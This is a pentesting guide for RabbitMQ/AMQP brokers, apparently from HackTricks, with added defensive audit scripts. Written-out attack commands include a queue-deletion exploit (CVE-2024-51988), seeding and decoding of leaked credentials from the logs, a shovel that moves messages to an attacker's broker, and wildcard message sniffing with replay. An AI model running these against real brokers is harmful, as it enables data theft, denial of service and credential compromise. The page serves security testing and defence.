5671,5672 - Pentesting AMQP
Tip
Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Basic Information
From cloudamqp:
RabbitMQ is a message-queueing software also known as a message broker or queue manager. Simply said; it is software where queues are defined, to which applications connect in order to transfer a message or messages.
A message can include any kind of information. It could, for example, have information about a process or task that should start on another application (which could even be on another server), or it could be just a simple text message. The queue-manager software stores the messages until a receiving application connects and takes a message off the queue. The receiving application then processes the message.
Definition from .
Default port: 5672,5671
PORT STATE SERVICE VERSION
5672/tcp open amqp RabbitMQ 3.1.5 (0-9)
- Default credentials: guest:guest. RabbitMQ restricts them to localhost via loopback_users, but many Docker/IoT images disable that check, so always try a remote login before assuming it is blocked.
- Authentication mechanisms: PLAIN and AMQPLAIN are enabled by default, ANONYMOUS is controlled by anonymous_login_user/anonymous_login_pass, and EXTERNAL (x509) may appear when TLS is enabled. Enumerate what the broker advertises so you know whether to attempt password spraying or certificate impersonation later.
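The settings named in the two bullets above (loopback_users, auth_mechanisms.N, anonymous_login_user, the TLS listener) all live in the broker's sysctl-style rabbitmq.conf. The script below is an added example, not part of the original page or of RabbitMQ itself: it parses such a file and reports the weak combinations a reviewer would look for before an assessment starts. Both config texts are constructed samples, the certificate paths are placeholders, and the key names used are the ones documented by RabbitMQ.

```python
"""Audit a rabbitmq.conf for the weak authentication settings discussed above.
Added example code (not from the page or from RabbitMQ); samples are constructed."""
import re

# Constructed: the pattern many container images ship with. guest may log in
# remotely, ANONYMOUS is enabled and mapped to guest, and only a plaintext
# listener exists.
WEAK_CONF = """
listeners.tcp.default = 5672
loopback_users = none
auth_mechanisms.1 = PLAIN
auth_mechanisms.2 = AMQPLAIN
auth_mechanisms.3 = ANONYMOUS
anonymous_login_user = guest
anonymous_login_pass = guest
"""

# Constructed hardened counterpart: TLS-only listener, client certificate
# required, guest left on loopback (the default when loopback_users is absent).
HARDENED_CONF = """
listeners.tcp = none
listeners.ssl.default = 5671
ssl_options.cacertfile = /path/to/ca.pem        # placeholder path
ssl_options.certfile = /path/to/server.pem      # placeholder path
ssl_options.keyfile = /path/to/server.key       # placeholder path
ssl_options.verify = verify_peer
ssl_options.fail_if_no_peer_cert = true
auth_mechanisms.1 = EXTERNAL
auth_mechanisms.2 = PLAIN
"""


def parse_conf(text):
    """Parse sysctl-style 'key = value' lines; '#' starts a comment."""
    conf = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if "=" not in line:
            continue
        key, _, value = line.partition("=")
        conf[key.strip()] = value.strip()
    return conf


def enabled_mechanisms(conf):
    """Values of auth_mechanisms.N in key order; empty means the broker default applies."""
    keys = sorted(k for k in conf if re.fullmatch(r"auth_mechanisms\.\d+", k))
    return [conf[k].upper() for k in keys]


def audit(conf):
    """Return (finding_id, detail) pairs for the weak settings discussed above."""
    findings = []
    mechs = enabled_mechanisms(conf)

    # loopback_users = none, or loopback_users.guest = false, lifts the localhost-only rule
    if conf.get("loopback_users") == "none" or \
            conf.get("loopback_users.guest", "true").lower() == "false":
        findings.append(("GUEST_REMOTE",
                         "guest is not restricted to loopback; remote guest:guest logins are possible"))

    if "ANONYMOUS" in mechs:
        user = conf.get("anonymous_login_user", "guest")
        findings.append(("ANONYMOUS_ENABLED",
                         f"ANONYMOUS SASL is enabled; unauthenticated clients become '{user}'"))

    # PLAIN/AMQPLAIN send the password in the clear unless the listener is TLS
    has_tls = any(k.startswith("listeners.ssl") for k in conf)
    plaintext_creds = not mechs or any(m in ("PLAIN", "AMQPLAIN") for m in mechs)
    if plaintext_creds and not has_tls:
        findings.append(("NO_TLS_LISTENER",
                         "PLAIN/AMQPLAIN credentials are accepted but no TLS listener is configured"))

    # EXTERNAL (x509) only makes sense when the listener insists on a client certificate
    if "EXTERNAL" in mechs and \
            conf.get("ssl_options.fail_if_no_peer_cert", "false").lower() != "true":
        findings.append(("EXTERNAL_NO_PEER_CERT",
                         "EXTERNAL is enabled but ssl_options.fail_if_no_peer_cert is not true"))
    return findings


if __name__ == "__main__":
    for name, text in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit(parse_conf(text)) or "no findings")
```

Run it against `/etc/rabbitmq/rabbitmq.conf` once you have a shell on the host; an empty result for the hardened sample is the baseline a broker exposed beyond localhost should meet.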
Enumeration
Manual
import amqp

# By default it uses "guest":"guest"
conn = amqp.connection.Connection(host="IP", port=5672, virtual_host="/")
conn.connect()
# SASL mechanisms the broker offered during the handshake
print("SASL mechanisms:", conn.mechanisms)
# product, version, platform, capabilities, etc. advertised by the server
for k, v in conn.server_properties.items():
    print(k, v)
Once authenticated, dump conn.server_properties, conn.channel_max and conn.frame_max to understand the throughput limits and whether oversized frames could exhaust resources.
Automatic
nmap -sV -Pn -n -T4 -p 5672 --script amqp-info IP
PORT STATE SERVICE VERSION
5672/tcp open amqp RabbitMQ 3.1.5 (0-9)
| amqp-info:
| capabilities:
| publisher_confirms: YES
| exchange_exchange_bindings: YES
| basic.nack: YES
| consumer_cancel_notify: YES
| copyright: Copyright (C) 2007-2013 GoPivotal, Inc.
| information: Licensed under the MPL. See http://www.rabbitmq.com/
| platform: Erlang/OTP
| product: RabbitMQ
| version: 3.1.5
| mechanisms: PLAIN AMQPLAIN
|_ locales: en_US
TLS/SASL checks
- Probe AMQPS:
openssl s_client -alpn amqp -connect IP:5671 -tls1_3 -msg </dev/null
This leaks the certificate chain, the supported TLS versions and whether mutual TLS is required.
- List listeners without creds:
rabbitmq-diagnostics -q listeners
Useful once you have low-priv shell access on the host.
- Spot ANONYMOUS logins: if the broker advertises the ANONYMOUS SASL mechanism, try connecting with an empty username/password; RabbitMQ will internally map you to anonymous_login_user (defaults to guest).
Brute Force
Exploitation Tips
Queue deletion without configure perms (CVE-2024-51988)
RabbitMQ ≤ 3.12.10 (and unpatched Tanzu builds) fails to check the configure permission when queues are deleted through the HTTP API. Any authenticated user with access to the target vhost can delete any queue even if they only hold read or write rights.
# confirm vulnerable version first
rabbitmqadmin -H target -P 15672 -u user -p pass show overview | grep -i version
# delete a high-value queue
curl -k -u user:pass -X DELETE https://target:15672/api/queues/%2F/payments-processing
Combine this with rabbitmqadmin list permissions to identify vhosts where your low-priv user has partial access, then wipe queues to cause a denial of service or to trigger compensating controls that are monitored on the AMQP side. See 15672 pentesting for more HTTP API endpoints to chain with this bug.
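For the defender's side of CVE-2024-51988, the question is which accounts are exposed: every user who holds a permission row on a vhost but whose configure regex does not cover a given queue. The script below is an added example (not from the page, not RabbitMQ tooling) that answers it from a version string and a simplified, tab-separated rendering of the fields `rabbitmqadmin list permissions` shows (vhost, user, configure, write, read). The permission rows are constructed, the vulnerable range is the one stated on this page, and the regexes are treated as anchored, with an empty pattern matching nothing, which is how RabbitMQ documents them.

```python
"""Which users can still delete queues on a broker affected by CVE-2024-51988?
Added example code; the permission listing below is constructed."""
import re

# Constructed sample in the shape: vhost <TAB> user <TAB> configure <TAB> write <TAB> read
SAMPLE_PERMS = """\
/\tadmin\t.*\t.*\t.*
/\tpayments-svc\t\t.*\t.*
/\treporting\t\t\t^reports\\..*
/\tguest\t^guest-.*\t.*\t.*
"""


def parse_version(version):
    """'3.12.10' or '3.12.10-rc.1' -> (3, 12, 10)."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)", version)
    if not m:
        raise ValueError(f"unrecognised version string: {version!r}")
    return tuple(int(x) for x in m.groups())


def is_vulnerable(version):
    """Per this page: RabbitMQ <= 3.12.10 skips the configure check on queue deletion."""
    return parse_version(version) <= (3, 12, 10)


def parse_permissions(text):
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        vhost, user, configure, write, read = line.split("\t")
        rows.append({"vhost": vhost, "user": user, "configure": configure,
                     "write": write, "read": read})
    return rows


def permission_matches(pattern, name):
    """RabbitMQ permission regexes: empty pattern matches nothing, else whole-name match."""
    return bool(pattern) and re.fullmatch(pattern, name) is not None


def exposed_users(version, perms, vhost, queue):
    """Users who can delete `queue` on `vhost` through the HTTP API *only because*
    of the bug: they have access to the vhost but configure does not cover the queue."""
    if not is_vulnerable(version):
        return []
    return sorted(
        p["user"] for p in perms
        if p["vhost"] == vhost and not permission_matches(p["configure"], queue)
    )


if __name__ == "__main__":
    perms = parse_permissions(SAMPLE_PERMS)
    for ver in ("3.12.10", "3.13.7"):
        print(ver, exposed_users(ver, perms, "/", "payments-processing"))
```

Accounts in the output are the ones to restrict (or the reason to patch first); an empty list on a patched version is expected, since the configure check is enforced again.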
Harvesting credentials from RabbitMQ logs (CVE-2025-50200)
Until 4.0.8/4.1.0, hitting the management API with HTTP basic auth on a non-existent resource caused the broker to write the whole Authorization header (base64) to the log. If you obtain limited filesystem access (e.g. Docker escape, plugin RCE), grep /var/log/rabbitmq/rabbit@*.log for Authorization: to recover the credentials of other tenants or service accounts.
curl -k -u pentester:SuperSecret https://target:15672/api/queues/%2f/ghost
sudo grep -R "Authorization:" /var/log/rabbitmq | cut -d' ' -f3 | base64 -d
Trigger this deliberately against bogus endpoints to seed fresh secrets into the logs, then pivot by reusing the decoded creds over AMQP, STOMP, MQTT or the OS itself.
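From the incident-response side, the grep above tells you that something leaked; what an operator needs is which accounts leaked and how often, so they can rotate those credentials after upgrading. The script below is an added example (not from the page or from RabbitMQ): it scans log text for Basic tokens, decodes them, skips malformed ones, and reports per-user counts without reproducing the passwords. The log lines are constructed to illustrate the shape of the problem and do not copy any real broker's log format; the two credential pairs are the ones already shown on this page plus a second made-up one.

```python
"""Detect leaked HTTP Basic credentials in RabbitMQ logs (CVE-2025-50200 exposure).
Added example code; SAMPLE_LOG is constructed and only illustrative in shape."""
import base64
import binascii
import re
from collections import Counter

AUTH_RE = re.compile(r"[Aa]uthorization:\s*Basic\s+([A-Za-z0-9+/=]+)")

# Constructed: one normal AMQP line, three leaked headers (two for the same
# account), and one token that is valid base64 but not a user:password pair.
SAMPLE_LOG = """\
2025-06-01 10:14:02.118 [info] <0.811.0> accepting AMQP connection 10.0.0.5:51020 -> 10.0.0.2:5672
2025-06-01 10:14:09.402 [warning] <0.940.0> management: 404 for GET /api/queues/%2f/ghost, headers: host: broker:15672, authorization: Basic cGVudGVzdGVyOlN1cGVyU2VjcmV0
2025-06-01 10:15:11.007 [warning] <0.941.0> management: 404 for GET /api/exchanges/%2f/missing, headers: authorization: Basic cmVwb3J0aW5nOnIzcDBydHM=
2025-06-01 10:16:30.550 [warning] <0.942.0> management: 404 for DELETE /api/queues/%2f/nope, headers: authorization: Basic cGVudGVzdGVyOlN1cGVyU2VjcmV0
2025-06-01 10:17:00.001 [warning] <0.943.0> management: 404 for GET /api/x, headers: authorization: Basic bm9jb2xvbg==
"""


def leaked_basic_auth(lines):
    """Yield (line_no, username, password) for every decodable Basic token."""
    for n, line in enumerate(lines, 1):
        m = AUTH_RE.search(line)
        if not m:
            continue
        try:
            decoded = base64.b64decode(m.group(1), validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue  # not a well-formed token; nothing to rotate
        user, sep, password = decoded.partition(":")
        if sep:  # Basic tokens are 'user:password'; anything else is noise
            yield n, user, password


def exposure_report(text):
    """Per-account summary (count and first line) without echoing the secrets."""
    counts = Counter()
    first_seen = {}
    for n, user, _password in leaked_basic_auth(text.splitlines()):
        counts[user] += 1
        first_seen.setdefault(user, n)
    return {u: {"occurrences": c, "first_line": first_seen[u]} for u, c in counts.items()}


if __name__ == "__main__":
    for user, info in exposure_report(SAMPLE_LOG).items():
        print(f"rotate credentials for {user!r}: leaked {info['occurrences']}x, "
              f"first at line {info['first_line']}")
```

Point it at the concatenated rabbit@*.log files after upgrading to a fixed release; the log files themselves should be treated as sensitive until the listed accounts have been rotated.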
Use rabbitmqadmin-ng
rabbitmqadmin v2 (aka rabbitmqadmin-ng) is a standalone CLI that talks to the management API and now ships statically linked builds for Linux/macOS/Windows. Drop it on your bounce box and script it:
# enumerate live channels and prefetch pressure
rabbitmqadmin --host target --port 15672 --username user --password pass channels list --non-interactive
# clone a shovel to exfiltrate messages to attacker-controlled broker
rabbitmqadmin shovels declare_amqp091 \
    --name loot \
    --source-uri amqp://user:pass@target:5672/%2f \
    --destination-uri amqp://attacker:pw@vps:5672/%2f \
    --source-queue transactions \
    --destination-queue stolen
Because the tool supports blue/green-aware health checks, you can also abuse rabbitmqadmin health_check port_listener --port 5672 to remotely confirm whether TLS listeners are exposed or to put load on the service for timing probes.
Message hijacking/sniffing
If you find permissive policies (.* bindings, topic exchanges, or x-queue-master-locator = min-masters), you can silently capture messages without deleting them:
import pika

creds = pika.PlainCredentials('user', 'pass')
conn = pika.BlockingConnection(pika.ConnectionParameters('IP', 5672, '/', creds))
ch = conn.channel()
# exclusive + auto_delete: the queue disappears with the connection
ch.queue_declare(queue='loot', exclusive=True, auto_delete=True)
# '#' matches every routing key published to the topic exchange
ch.queue_bind(queue='loot', exchange='amq.topic', routing_key='#')
# consume() yields (None, None, None) when inactivity_timeout expires
for method, props, body in ch.consume('loot', inactivity_timeout=5):
    if body:
        print(method.routing_key, body)
Change the routing key to audit.# or payments.* to focus on sensitive pipelines, then republish forged messages by tweaking the basic_publish arguments, which is handy for replay attacks against downstream microservices.
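Both the wildcard sniffing binding above and the shovel in the rabbitmqadmin-ng section leave artifacts the management API exposes: a binding whose routing key is `#` (or contains `*`) on a topic exchange, and a shovel parameter whose destination URI points at a broker you do not operate. The script below is an added example (not from the page or from RabbitMQ) that audits JSON in the shape returned by `/api/bindings` and `/api/parameters/shovel`; the JSON documents are constructed, the host allowlist is an assumption you replace with your own brokers, and 203.0.113.10 is a documentation address standing in for an external destination.

```python
"""Audit bindings and shovels for the sniffing/exfiltration patterns described above.
Added example code; BINDINGS_JSON and SHOVELS_JSON are constructed samples."""
import json
from urllib.parse import urlparse

# Constructed, shaped like GET /api/bindings
BINDINGS_JSON = """[
  {"source": "amq.topic", "vhost": "/", "destination": "payments-processing",
   "destination_type": "queue", "routing_key": "payments.created", "arguments": {}},
  {"source": "amq.topic", "vhost": "/", "destination": "amq.gen-JzTY20BRgKO-HjmUJj0wLg",
   "destination_type": "queue", "routing_key": "#", "arguments": {}},
  {"source": "audit", "vhost": "/", "destination": "loot",
   "destination_type": "queue", "routing_key": "audit.#", "arguments": {}},
  {"source": "orders", "vhost": "/", "destination": "orders-fulfilment",
   "destination_type": "queue", "routing_key": "orders.*", "arguments": {}}
]"""

# Constructed, shaped like GET /api/parameters/shovel
SHOVELS_JSON = """[
  {"vhost": "/", "component": "shovel", "name": "replicate-orders",
   "value": {"src-uri": "amqp://svc:pw@broker-a.internal:5672/%2f", "src-queue": "orders",
             "dest-uri": "amqp://svc:pw@broker-b.internal:5672/%2f", "dest-queue": "orders"}},
  {"vhost": "/", "component": "shovel", "name": "loot",
   "value": {"src-uri": "amqp://user:pass@broker-a.internal:5672/%2f", "src-queue": "transactions",
             "dest-uri": "amqp://attacker:pw@203.0.113.10:5672/%2f", "dest-queue": "stolen"}}
]"""

# Assumption: the brokers this team operates (replace with your own inventory)
OWN_BROKERS = {"broker-a.internal", "broker-b.internal"}


def wildcard_bindings(bindings):
    """Queue bindings whose routing key can match many topics at once.
    '#' (zero or more words) is high severity, '*' (exactly one word) medium."""
    out = []
    for b in bindings:
        if b.get("destination_type") != "queue":
            continue
        key = b.get("routing_key", "")
        if "#" in key:
            severity = "high"
        elif "*" in key:
            severity = "medium"
        else:
            continue
        out.append({
            "severity": severity,
            "exchange": b["source"],
            "queue": b["destination"],
            "routing_key": key,
            # server-named queues (amq.gen-*) usually belong to an ad-hoc consumer
            "server_named": b["destination"].startswith("amq.gen-"),
        })
    return out


def destination_hosts(dest_uri):
    """dest-uri may be one URI, a whitespace-separated list, or a JSON list."""
    uris = dest_uri if isinstance(dest_uri, list) else str(dest_uri).split()
    return [urlparse(u).hostname for u in uris]


def foreign_shovels(shovels, allowed_hosts):
    """Shovels that push messages to a broker outside `allowed_hosts`."""
    out = []
    for s in shovels:
        if s.get("component") != "shovel":
            continue
        hosts = destination_hosts(s["value"].get("dest-uri", ""))
        foreign = [h for h in hosts if h not in allowed_hosts]
        if foreign:
            out.append({"name": s["name"], "vhost": s["vhost"],
                        "dest_host": foreign[0], "dest_queue": s["value"].get("dest-queue")})
    return out


if __name__ == "__main__":
    for w in wildcard_bindings(json.loads(BINDINGS_JSON)):
        print("binding", w)
    for f in foreign_shovels(json.loads(SHOVELS_JSON), OWN_BROKERS):
        print("shovel ", f)
```

Feed it the two endpoints' real output (for example saved with curl against port 15672) and review every high-severity binding and every foreign shovel; a `#` binding on a server-named queue that no deployed service declares is exactly what the pika snippet above leaves behind.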
Other RabbitMQ ports
At https://www.rabbitmq.com/networking.html you can see that RabbitMQ uses several ports:
- 1883, 8883: MQTT clients without and with TLS, if the MQTT plugin is enabled. Learn more about how to pentest MQTT here.
- 4369: epmd, a peer discovery service used by RabbitMQ nodes and CLI tools. Learn more about how to pentest this service here.
- 5672, 5671: used by AMQP 0-9-1 and 1.0 clients without and with TLS
- 15672: HTTP API clients, management UI and rabbitmqadmin (only if the management plugin is enabled). Learn more about how to pentest this service here.
- 15674: STOMP-over-WebSockets clients (only if the Web STOMP plugin is enabled)
- 15675: MQTT-over-WebSockets clients (only if the Web MQTT plugin is enabled)
- 15692: Prometheus metrics (only if the Prometheus plugin is enabled)
- 25672: used for inter-node and CLI tools communication (Erlang distribution server port) and is allocated from a dynamic range (limited to a single port by default, computed as AMQP port + 20000). Unless external connections on these ports are really necessary (e.g. the cluster uses federation or CLI tools are used on machines outside the subnet), these ports should not be publicly exposed. See the networking guide for details. Only 9 of these ports are open on the internet.
- 35672-35682: used by CLI tools (Erlang distribution client ports) for communication with nodes and are allocated from a dynamic range (computed as server distribution port + 10000 through server distribution port + 10010). See the networking guide for details.
- 61613, 61614: STOMP clients without and with TLS (only if the STOMP plugin is enabled). Fewer than 10 devices have this port open, and it is usually used for UDP by DHT nodes.
See also
- Shodan
- AMQP
References
- CloudAMQP - RabbitMQ for beginners
- RabbitMQ Networking Guide
- RabbitMQ Authentication, Authorisation & Access Control
- CVE-2024-51988 - RabbitMQ HTTP API queue deletion bug
- GHSA-gh3x-4x42-fvq8 - RabbitMQ logs Authorization header
- rabbitmqadmin v2 (rabbitmqadmin-ng)